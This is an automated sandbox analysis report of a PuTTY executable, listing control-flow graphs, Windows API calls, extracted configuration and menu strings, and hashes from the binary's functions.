7ff67860b530-7ff67860b541 call 7ff67864a5d0 1824->1827 1830 7ff67860b55b-7ff67860b5f5 call 7ff678611a90 call 7ff67860c870 * 3 call 7ff67860ccf0 1827->1830 1831 7ff67860b543-7ff67860b558 call 7ff67860cd00 1827->1831 1844 7ff67860b5f7-7ff67860b609 call 7ff67864a5a0 1830->1844 1845 7ff67860b61a-7ff67860b643 call 7ff678611d70 call 7ff678613590 call 7ff67864a5d0 1830->1845 1831->1830 1844->1845 1850 7ff67860b60b-7ff67860b617 call 7ff67861a3a0 1844->1850 1857 7ff67860b65d-7ff67860b67e call 7ff678611a90 call 7ff67864a5d0 1845->1857 1858 7ff67860b645-7ff67860b65a call 7ff67860cd00 1845->1858 1850->1845 1865 7ff67860b698-7ff67860b6bd call 7ff678611a90 call 7ff67860ccf0 1857->1865 1866 7ff67860b680-7ff67860b695 call 7ff67860cd00 1857->1866 1858->1857 1873 7ff67860b6bf-7ff67860b6d1 call 7ff67864a5a0 1865->1873 1874 7ff67860b6e2-7ff67860b70b call 7ff678611d70 call 7ff678613590 call 7ff67864a5d0 1865->1874 1866->1865 1873->1874 1879 7ff67860b6d3-7ff67860b6df call 7ff67861a3a0 1873->1879 1886 7ff67860b70d-7ff67860b722 call 7ff67860cd00 1874->1886 1887 7ff67860b725-7ff67860b746 call 7ff678611a90 call 7ff67864a5d0 1874->1887 1879->1874 1886->1887 1894 7ff67860b748-7ff67860b75d call 7ff67860cd00 1887->1894 1895 7ff67860b760-7ff67860b781 call 7ff678611a90 call 7ff67864a5d0 1887->1895 1894->1895 1902 7ff67860b79b-7ff67860b7bc call 7ff678611a90 call 7ff67864a5d0 1895->1902 1903 7ff67860b783-7ff67860b798 call 7ff67860cd00 1895->1903 1910 7ff67860b7d6-7ff67860b7f7 call 7ff678611a90 call 7ff67864a5d0 1902->1910 1911 7ff67860b7be-7ff67860b7d3 call 7ff67860cd00 1902->1911 1903->1902 1918 7ff67860b7f9-7ff67860b80e call 7ff67860cd00 1910->1918 1919 7ff67860b811-7ff67860b832 call 7ff678611a90 call 7ff67864a5d0 1910->1919 1911->1910 1918->1919 1926 7ff67860b84c-7ff67860b89c call 7ff678611a90 call 7ff67864a5d0 call 7ff67860cd00 call 7ff678611b80 call 7ff67864a5d0 1919->1926 1927 7ff67860b834-7ff67860b849 call 7ff67860cd00 1919->1927 1940 7ff67860b8b6-7ff67860b8d7 call 7ff678611a90 call 7ff67864a5d0 1926->1940 1941 7ff67860b89e-7ff67860b8b3 call 7ff67860cd00 1926->1941 1927->1926 1948 7ff67860b8d9-7ff67860b8ee call 7ff67860cd00 1940->1948 1949 7ff67860b8f1-7ff67860b912 call 7ff678611a90 call 7ff67864a5d0 1940->1949 1941->1940 1948->1949 1956 7ff67860b92c-7ff67860b951 call 7ff678611a90 call 7ff67860ccf0 1949->1956 1957 7ff67860b914-7ff67860b929 call 7ff67860cd00 1949->1957 1964 7ff67860b976-7ff67860b9d5 call 7ff678611d70 call 7ff678613590 call 7ff67864a5d0 call 7ff67860cd00 call 7ff678611b80 call 7ff67860cf90 1956->1964 1965 7ff67860b953-7ff67860b965 call 7ff67864a5a0 1956->1965 1957->1956 1983 7ff67860b9e6-7ff67860ba0f call 7ff6786120a0 call 7ff678626740 call 7ff67864a5d0 1964->1983 1984 7ff67860b9d7-7ff67860b9e3 call 7ff67864a570 1964->1984 1965->1964 1971 7ff67860b967-7ff67860b973 call 7ff67861a3a0 1965->1971 1971->1964 1993 7ff67860ba29-7ff67860ba4a call 7ff678611a90 call 7ff67864a5d0 1983->1993 1994 7ff67860ba11-7ff67860ba26 call 7ff67860cd00 1983->1994 1984->1983 2001 7ff67860ba4c-7ff67860ba61 call 7ff67860cd00 1993->2001 2002 7ff67860ba64-7ff67860bb9e call 7ff678611a90 call 7ff67860c3a0 call 7ff67864a5d0 call 7ff67860cd00 call 7ff678611b80 call 7ff67864a5d0 call 7ff67860cd00 call 7ff678611b80 call 7ff67864a5d0 call 7ff67860cd00 call 7ff678611b80 call 7ff67864a5d0 call 7ff67860cd00 call 7ff678611b80 call 7ff67864a5d0 call 7ff67860cd00 call 7ff678611b80 1993->2002 1994->1993 2001->2002 2039 7ff67860bba0-7ff67860bbc2 call 7ff67864a5d0 call 7ff67860cd00 2002->2039 2040 7ff67860bbd4-7ff67860be3e call 7ff67864a5d0 call 7ff67860cd00 call 7ff678611b80 call 7ff67864a5d0 call 7ff67860cd00 call 7ff678611b80 call 7ff67864a5d0 call 7ff67860cd00 call 7ff678611b80 call 7ff67864a5d0 call 7ff67860cd00 call 7ff678611b80 call 7ff67864a5d0 call 7ff67860cd00 call 7ff678611b80 call 7ff67864a5d0 call 7ff67860cd00 call 7ff678611b80 call 7ff67864a5d0 call 7ff67860cd00 call 7ff678611b80 call 7ff67864a5d0 call 7ff67860cd00 call 7ff678611b80 call 7ff67864a5d0 call 7ff67860cd00 call 7ff678611b80 call 7ff67864a5d0 call 7ff67860cd00 call 7ff678611b80 call 7ff67864a5d0 call 7ff67860cd00 call 7ff678611b80 call 7ff678611a90 call 7ff67864a5d0 2002->2040 2039->2040 2050 7ff67860bbc4-7ff67860bbcf call 7ff678611b80 2039->2050 2117 7ff67860be58-7ff67860be79 call 7ff678611a90 call 7ff67864a5d0 2040->2117 2118 7ff67860be40-7ff67860be55 call 7ff67860cd00 2040->2118 2050->2040 2125 7ff67860be7b-7ff67860be90 call 7ff67860cd00 2117->2125 2126 7ff67860be93-7ff67860beb4 call 7ff678611a90 call 7ff67864a5d0 2117->2126 2118->2117 2125->2126 2133 7ff67860beb6-7ff67860becb call 7ff67860cd00 2126->2133 2134 7ff67860bece-7ff67860beef call 7ff678611a90 call 7ff67864a5d0 2126->2134 2133->2134 2141 7ff67860bf09-7ff67860bf2e call 7ff678611a90 call 7ff67860cd50 2134->2141 2142 7ff67860bef1-7ff67860bf06 call 7ff67860cd00 2134->2142 2149 7ff67860bf3f-7ff67860bf6c call 7ff678612190 call 7ff678626740 call 7ff67860cd50 2141->2149 2150 7ff67860bf30-7ff67860bf3c call 7ff67864a530 2141->2150 2142->2141 2159 7ff67860bf7d-7ff67860bfaa call 7ff678612190 call 7ff678626740 call 7ff67860cd50 2149->2159 2160 7ff67860bf6e-7ff67860bf7a call 7ff67864a530 2149->2160 2150->2149 2169 7ff67860bfbb-7ff67860c01a call 7ff678612190 call 7ff678626740 call 7ff67864a5d0 call 7ff67860cd00 call 7ff678611b80 call 7ff67860ccf0 2159->2169 2170 7ff67860bfac-7ff67860bfb8 call 7ff67864a530 2159->2170 2160->2159 2185 7ff67860c01c-7ff67860c02e call 7ff67864a5a0 2169->2185 2186 7ff67860c03f-7ff67860c163 call 7ff678611d70 call 7ff678613590 call 7ff67864a5d0 call 7ff67860cd00 call 7ff678611b80 call 7ff67864a5d0 call 7ff67860cd00 call 7ff678611b80 call 7ff67864a5d0 call 7ff67860cd00 call 7ff678611b80 call 7ff67864a5d0 call 7ff67860cd00 call 7ff678611b80 call 7ff67864a5d0 call 7ff67860cd00 call 7ff678611b80 call 7ff67860ccf0 2169->2186 2170->2169 2185->2186 2192 7ff67860c030-7ff67860c03c call 7ff67861a3a0 2185->2192 2228 7ff67860c188-7ff67860c1b1 call 7ff678611d70 call 7ff678613590 call 7ff67864a5d0 2186->2228 2229 7ff67860c165-7ff67860c177 call 7ff67864a5a0 2186->2229 2192->2186 2241 7ff67860c1cb-7ff67860c1ec call 7ff678611a90 call 7ff67864a5d0 2228->2241 2242 7ff67860c1b3-7ff67860c1c8 call 7ff67860cd00 2228->2242 2229->2228 2234 7ff67860c179-7ff67860c185 call 7ff67861a3a0 2229->2234 2234->2228 2249 7ff67860c206-7ff67860c227 call 7ff678611a90 call 7ff67864a5d0 2241->2249 2250 7ff67860c1ee-7ff67860c203 call 7ff67860cd00 2241->2250 2242->2241 2257 7ff67860c229-7ff67860c23e call 7ff67860cd00 2249->2257 2258 7ff67860c241-7ff67860c27e call 7ff678611a90 call 7ff67860c3a0 call 7ff67860ccf0 2249->2258 2250->2249 2257->2258 2267 7ff67860c280-7ff67860c292 call 7ff67864a5a0 2258->2267 2268 7ff67860c2a3-7ff67860c2fb call 7ff678611d70 call 7ff678613590 call 7ff67864a5d0 call 7ff67860cd00 call 7ff678611b80 call 7ff67864a5d0 2258->2268 2267->2268 2274 7ff67860c294-7ff67860c2a0 call 7ff67861a3a0 2267->2274 2286 7ff67860c2fd-7ff67860c312 call 7ff67860cd00 2268->2286 2287 7ff67860c315-7ff67860c336 call 7ff678611a90 call 7ff67864a5d0 2268->2287 2274->2268 2286->2287 2294 7ff67860c338-7ff67860c34d call 7ff67860cd00 2287->2294 2295 7ff67860c350-7ff67860c37e call 7ff678611a90 call 7ff67868a9f0 2287->2295 2294->2295
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID:
                      • String ID: %d,%d,%d$ANSIColour$BCE$BlinkText$BoldAsColour$BugChanReq$BugDeriveKey2$BugDropStart$BugFilterKexinit$BugHMAC2$BugIgnore1$BugIgnore2$BugMaxPkt2$BugOldGex2$BugPKSessID2$BugPlainPW1$BugRSA1$BugRSAPad2$BugRSASHA2CertUserauth$BugRekey2$BugWinadj$BuggyMAC$CJKAmbigWide$CapsLockCyr$Colour%d$ConnectionSharing$ConnectionSharingDownstream$ConnectionSharingUpstream$CtrlShiftCV$CtrlShiftIns$EraseToScrollback$FontQuality$FontVTMode$LineCodePage$LocalPortAcceptAll$LockSize$LoginShell$MouseAutocopy$MouseIsXterm$MouseOverride$MousePaste$PasteControls$PasteRTF$PortForwardings$Printer$RawCNP$RectSelect$RemotePortAcceptAll$SSHManualHostKeys$SUPDUPCharset$SUPDUPLocation$SUPDUPMoreProcessing$SUPDUPScrolling$ScrollBar$ScrollBarFullScreen$ScrollOnDisp$ScrollOnKey$ScrollbarOnLeft$SerialDataBits$SerialFlowControl$SerialLine$SerialParity$SerialSpeed$SerialStopHalfbits$ShadowBold$ShadowBoldOffset$StampUtmp$TermHeight$TermWidth$The Internet$TrueColour$TryPalette$UTF8Override$UTF8linedraw$UseSystemColours$WideBoldFont$WideFont$WinTitle$WindowClass$Wordness%d$X11AuthFile$X11AuthType$X11Display$X11Forward$Xterm256Colour
                      • API String ID: 0-1829101210
                      • Opcode ID: 22f5ba9b024153285404823b1049d72f0d81ff970af42732919e8d31ed2423a0
                      • Instruction ID: 5deb95293963c097d475e33a6df80c95eadcf24cba776c1187207a087bd685f6
                      • Opcode Fuzzy Hash: 22f5ba9b024153285404823b1049d72f0d81ff970af42732919e8d31ed2423a0
                      • Instruction Fuzzy Hash: 34B23952F3851661FA14A7329A61ABB1A465F81BD0F709031DC0D8BB97EE2DED02B35C
                      Function 00007FF6785D53E3 Relevance: 100.4, APIs: 38, Strings: 19, Instructions: 618windowtimeCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 2302 7ff6785d53e3-7ff6785d53f0 2303 7ff6785d53f2-7ff6785d5493 call 7ff67868c310 call 7ff678611360 * 4 2302->2303 2313 7ff6785d5495-7ff6785d549f 2303->2313 2314 7ff6785d54da-7ff6785d54e8 GetDesktopWindow GetClientRect 2303->2314 2313->2314 2316 7ff6785d54a1-7ff6785d54d8 GetMonitorInfoA 2313->2316 2315 7ff6785d54ee-7ff6785d551a call 7ff678606f20 2314->2315 2320 7ff6785d5520-7ff6785d5527 2315->2320 2321 7ff6785d551c-7ff6785d551e 2315->2321 2316->2315 2322 7ff6785d552b-7ff6785d5637 call 7ff678612900 * 3 call 7ff6786112a0 call 7ff678611360 call 7ff6786112a0 * 2 call 7ff6785d1080 CreateWindowExW 2320->2322 2321->2322 2339 7ff6785d5655-7ff6785d566f 2322->2339 2340 7ff6785d5639-7ff6785d5650 GetLastError call 7ff678617ad0 call 7ff6785d6000 2322->2340 2342 7ff6785d56d0-7ff6785d5711 GetDC GetDeviceCaps * 2 ReleaseDC 2339->2342 2343 7ff6785d5671-7ff6785d567b 2339->2343 2340->2339 2344 7ff6785d5717-7ff6785d5757 call 7ff678613590 call 7ff6785d6080 call 7ff6786134f0 2342->2344 2343->2342 2346 7ff6785d567d-7ff6785d56a1 MonitorFromWindow 2343->2346 2359 7ff6785d5760-7ff6785d5775 2344->2359 2351 7ff6785d56a3-7ff6785d56ba 2346->2351 2352 7ff6785d56bc-7ff6785d56c2 2346->2352 2354 7ff6785d56c8-7ff6785d56ca 2351->2354 2352->2354 2354->2342 2356 7ff6785d56cc-7ff6785d56ce 2354->2356 2356->2342 2356->2344 2359->2359 2360 7ff6785d5777-7ff6785d57b7 call 7ff6785e0820 2359->2360 2363 7ff6785d57d2-7ff6785d57eb call 7ff6786112a0 2360->2363 2364 7ff6785d57b9-7ff6785d57cd call 7ff67869b8ac 2360->2364 2368 7ff6785d57ed-7ff6785d57fd 2363->2368 2369 7ff6785d5808-7ff6785d5afc call 7ff678611360 call 7ff6785fc600 call 7ff6785e9b50 call 7ff678611360 * 3 call 7ff6785e1330 GetWindowRect GetClientRect call 7ff678611360 SetWindowPos call 7ff6786134f0 call 7ff67868c310 CreateBitmap call 7ff678613590 CreateCaret SetScrollInfo GetDoubleClickTime GetSystemMenu CreatePopupMenu AppendMenuA * 2 CreateMenu call 7ff67860c930 2363->2369 2364->2363 2368->2369 2394 7ff6785d5b00-7ff6785d5b13 DeleteMenu 2369->2394 2394->2394 2395 7ff6785d5b15-7ff6785d5b1c 2394->2395 2396 7ff6785d5b1e-7ff6785d5b28 2395->2396 2397 7ff6785d5b71-7ff6785d5b8a AppendMenuA 2395->2397 2398 7ff6785d5b30-7ff6785d5b6a AppendMenuA 2396->2398 2399 7ff6785d5b90-7ff6785d5bb1 2397->2399 2398->2398 2400 7ff6785d5b6c-7ff6785d5b6f 2398->2400 2401 7ff6785d5bfe-7ff6785d5d23 call 7ff678611360 call 7ff6785dd2b0 2399->2401 2400->2397 2400->2399 2420 7ff6785d5bc0-7ff6785d5bf8 call 7ff678612890 call 7ff678613590 2401->2420 2421 7ff6785d5d29-7ff6785d5d3d 2401->2421 2420->2401 2428 7ff6785d5d42-7ff6785d5d49 call 7ff6786174f0 2420->2428 2421->2420 2431 7ff6785d5d62-7ff6785d5e2c call 7ff6785fc7a0 call 7ff6785d69c0 GetKeyboardLayout GetLocaleInfoA call 7ff67869cb74 ShowWindow SetForegroundWindow GetForegroundWindow call 7ff6785e9b60 UpdateWindow call 7ff6785dd010 2428->2431 2432 7ff6785d5d4b-7ff6785d5d59 2428->2432 2443 7ff6785d5e33-7ff6785d5e3f call 7ff6785fcae0 2431->2443 2432->2431 2446 7ff6785d5e81-7ff6785d5ea9 call 7ff6785fcf90 MsgWaitForMultipleObjects 2443->2446 2447 7ff6785d5e41-7ff6785d5e5e PeekMessageA 2443->2447 2453 7ff6785d5eb5-7ff6785d5ebd call 7ff6785fd0d0 2446->2453 2454 7ff6785d5eab-7ff6785d5eb0 call 7ff6785fd060 2446->2454 2447->2446 2448 7ff6785d5e60-7ff6785d5e7c GetForegroundWindow call 7ff6785e9b60 2447->2448 2448->2446 2458 7ff6785d5ed7-7ff6785d5eee PeekMessageW 2453->2458 2454->2453 2459 7ff6785d5ef4-7ff6785d5efc 2458->2459 2460 7ff6785d5e2e call 7ff6785fca80 2458->2460 2462 7ff6785d5efe-7ff6785d5f0e call 7ff6785f27f0 IsWindow 2459->2462 2463 7ff6785d5f1f-7ff6785d5f2b call 7ff6785d6bd0 2459->2463 2460->2443 2468 7ff6785d5ec0-7ff6785d5ec3 DispatchMessageW 2462->2468 2469 7ff6785d5f10-7ff6785d5f1b IsDialogMessageA 2462->2469 2470 7ff6785d5ec6-7ff6785d5ed1 2468->2470 2469->2470 2471 7ff6785d5f1d 2469->2471 2470->2458 2470->2460 2471->2468
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: Menu$CreateWindow$Append$Rect$CapsClientDeviceInfoMonitor$BitmapCaretClickDeleteDesktopDoubleErrorFromLastPopupReleaseScrollSystemTime
                      • String ID: &About %s$&Copy$&Duplicate Session$&Event Log$&Full Screen$&Help$&Paste$($(No sessions)$/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/window.c$C&lear Scrollback$C&opy All to Clipboard$Chan&ge Settings...$Ne&w Session...$Rese&t Terminal$Running with restricted process ACL$Sa&ved Sessions$Unable to create terminal window: %s$term->mouse_select_clipboards[0] == CLIP_LOCAL
                      • API String ID: 1687698585-3101482697
                      • Opcode ID: 48aaeea15ef7db0832bf7a1c76454805f5af20c663b68f04bbe3b26f6b097f6f
                      • Instruction ID: cb9e85f94155d396f6ac129f6e66960ad6ee2337a6b8a3fa5d6fcb68043f5c7d
                      • Opcode Fuzzy Hash: 48aaeea15ef7db0832bf7a1c76454805f5af20c663b68f04bbe3b26f6b097f6f
                      • Instruction Fuzzy Hash: 6E528E32A2865296F750DB35E8547BB2B91BF94B90F344035C94EC3BA5DE3CED05AB08
                      Function 00007FF6785F2C60 Relevance: 60.0, APIs: 26, Strings: 8, Instructions: 508windowtimeCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 2472 7ff6785f2c60-7ff6785f2c99 2473 7ff6785f2c9f-7ff6785f2ca8 2472->2473 2474 7ff6785f30e9-7ff6785f30f2 2472->2474 2477 7ff6785f2cae-7ff6785f2cb5 2473->2477 2478 7ff6785f322f-7ff6785f3236 2473->2478 2475 7ff6785f344e-7ff6785f345e call 7ff67868a9f0 2474->2475 2476 7ff6785f30f8-7ff6785f3100 2474->2476 2492 7ff6785f3460-7ff6785f3473 2475->2492 2476->2475 2479 7ff6785f3106-7ff6785f310d 2476->2479 2480 7ff6785f329f-7ff6785f32c5 call 7ff6785f4ab0 call 7ff67868a9f0 2477->2480 2481 7ff6785f2cbb-7ff6785f2d11 call 7ff6785f4a30 call 7ff6785f5130 call 7ff6786250e0 2477->2481 2478->2475 2483 7ff6785f323c-7ff6785f3244 2478->2483 2479->2475 2485 7ff6785f3113-7ff6785f3194 SendMessageA * 3 call 7ff6785f65e0 2479->2485 2480->2492 2516 7ff6785f2d13-7ff6785f2d2c 2481->2516 2517 7ff6785f2d6c-7ff6785f2f33 LoadIconA SendMessageA call 7ff678626440 MapDialogRect CreateWindowExA SendMessageA * 2 MapDialogRect CreateWindowExA SendMessageA * 2 2481->2517 2483->2475 2488 7ff6785f324a-7ff6785f326a KillTimer call 7ff678616a00 2483->2488 2499 7ff6785f3474-7ff6785f34c3 call 7ff6785f5130 call 7ff6786250e0 2485->2499 2500 7ff6785f319a-7ff6785f31af 2485->2500 2502 7ff6785f3290-7ff6785f329a call 7ff678624e00 2488->2502 2503 7ff6785f326c-7ff6785f328b MessageBoxA call 7ff678613590 2488->2503 2525 7ff6785f34c5-7ff6785f34d7 2499->2525 2526 7ff6785f3518-7ff6785f3553 call 7ff6785fa880 SendMessageA InvalidateRect SetFocus 2499->2526 2504 7ff6785f3205-7ff6785f3209 2500->2504 2502->2475 2503->2502 2510 7ff6785f31c0-7ff6785f31ff call 7ff6785f63b0 call 7ff6785f6550 call 7ff678613590 * 2 call 7ff6785f65e0 2504->2510 2511 7ff6785f320b-7ff6785f320d 2504->2511 2510->2499 2510->2504 2514 7ff6785f3218-7ff6785f3225 GetDlgItem 2511->2514 2520 7ff6785f3210-7ff6785f3216 2514->2520 2521 7ff6785f3227-7ff6785f322d DestroyWindow 2514->2521 2523 7ff6785f2d30-7ff6785f2d53 call 7ff6785f65f0 2516->2523 2531 7ff6785f3301-7ff6785f3312 SendMessageA 2517->2531 2532 7ff6785f2f39-7ff6785f2f57 2517->2532 2520->2510 2520->2514 2521->2520 2535 7ff6785f2d58-7ff6785f2d6a call 7ff6786250e0 2523->2535 2530 7ff6785f34e0-7ff6785f3516 call 7ff6785f65f0 call 7ff6786250e0 2525->2530 2526->2475 2530->2526 2539 7ff6785f3318-7ff6785f3331 call 7ff67869b8ac 2531->2539 2537 7ff6785f2fb2-7ff6785f2fc0 2532->2537 2535->2517 2535->2523 2545 7ff6785f2fc2-7ff6785f2fc5 2537->2545 2546 7ff6785f2f9a-7ff6785f2fac 2537->2546 2556 7ff6785f3333-7ff6785f3376 call 7ff6785f5130 call 7ff6786250e0 2539->2556 2551 7ff6785f2fe0 2545->2551 2552 7ff6785f2fc7-7ff6785f2fd4 call 7ff678624e90 2545->2552 2546->2537 2549 7ff6785f32ca-7ff6785f32fd SendMessageA 2546->2549 2549->2556 2557 7ff6785f32ff 2549->2557 2554 7ff6785f2fe2-7ff6785f2ff3 call 7ff678624e60 2551->2554 2552->2546 2567 7ff6785f2fd6-7ff6785f2fdb 2552->2567 2568 7ff6785f2ff5-7ff6785f3009 call 7ff67869b8ac 2554->2568 2569 7ff6785f300e-7ff6785f302b call 7ff67868c718 2554->2569 2574 7ff6785f33c8-7ff6785f33da call 7ff6785fa880 2556->2574 2575 7ff6785f3378-7ff6785f338a 2556->2575 2557->2539 2567->2554 2568->2569 2579 7ff6785f302d-7ff6785f3038 2569->2579 2580 7ff6785f303a 2569->2580 2585 7ff6785f33f3-7ff6785f3404 call 7ff6785f65e0 2574->2585 2586 7ff6785f33dc-7ff6785f33ed SetTimer 2574->2586 2577 7ff6785f3390-7ff6785f33af call 7ff6785f65f0 2575->2577 2584 7ff6785f33b4-7ff6785f33c6 call 7ff6786250e0 2577->2584 2583 7ff6785f3041-7ff6785f30a9 call 7ff6786a0680 SendMessageA 2579->2583 2580->2583 2593 7ff6785f30af-7ff6785f30de SendMessageA 2583->2593 2594 7ff6785f2f59 2583->2594 2584->2574 2584->2577 2596 7ff6785f3438-7ff6785f3447 ShowWindow 2585->2596 2597 7ff6785f3406-7ff6785f340b 2585->2597 2586->2585 2595 7ff6785f2f61-7ff6785f2f7d call 7ff67868c310 2593->2595 2598 7ff6785f30e4 2593->2598 2594->2595 2599 7ff6785f2f82-7ff6785f2f96 2595->2599 2596->2475 2601 7ff6785f3410-7ff6785f3416 2597->2601 2598->2599 2599->2546 2602 7ff6785f3430-7ff6785f3433 call 7ff6785fa750 2601->2602 2603 7ff6785f3418-7ff6785f342c call 7ff6785f65e0 2601->2603 2602->2596 2603->2601 2607 7ff6785f342e 2603->2607 2607->2596
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: Message$Send$Window$Rect$Dialog$CreateTimer$ClientDestroyFocusIconInvalidateItemKillLoadLongShowText
                      • String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/dialog.c$@$Cate&gory:$Demo screenshot failure$STATIC$SysTreeView32$firstpath$j == ctrl_path_elements(s->pathname) - 1
                      • API String ID: 443372750-407257924
                      • Opcode ID: 1e88966224fd870200e04f82941f27a47510af761bce352db075fa57f9858920
                      • Instruction ID: d3ea656f0381c48e5bc493b986e6cffa1af338143739cb9011ea18195ea31744
                      • Opcode Fuzzy Hash: 1e88966224fd870200e04f82941f27a47510af761bce352db075fa57f9858920
                      • Instruction Fuzzy Hash: BE32D333A2868281FB60DB36E4147AA7B90FB94B84F644135DE4D87B98DF3CD945DB08
                      Function 00007FF6785D51DF Relevance: 47.4, APIs: 12, Strings: 15, Instructions: 102libraryloaderregistryCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: AddressProc$ClipboardFormatInitializeLibraryLoadMessageRegister
                      • String ID: %s Fatal Error$AdjustWindowRectExForDpi$Failed to initialize COM subsystem$FlashWindowEx$GetDpiForMonitor$GetMonitorInfoA$GetSystemMetricsForDpi$MSWHEEL_ROLLMSG$MonitorFromPoint$MonitorFromWindow$PlaySoundA$ToUnicodeEx$shcore.dll$user32.dll$winmm.dll
                      • API String ID: 4030309821-128400427
                      • Opcode ID: 6ab206a9a58c67f68d16a2be7d32ebdfe3068d0f9bd6b9b9d91e215b1ad1a286
                      • Instruction ID: 050e8afd5ed868bc4b797d6722a7e4ea8346d811e8a97dbd7a11f4e7c7c1705d
                      • Opcode Fuzzy Hash: 6ab206a9a58c67f68d16a2be7d32ebdfe3068d0f9bd6b9b9d91e215b1ad1a286
                      • Instruction Fuzzy Hash: 14419F23E2DB02A0FA42AB35E85517A2B91AF55B80F740132CD0DC6765EF2CED46E75C
                      Function 00007FF6785F6F7C Relevance: 28.5, APIs: 6, Strings: 10, Instructions: 463COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
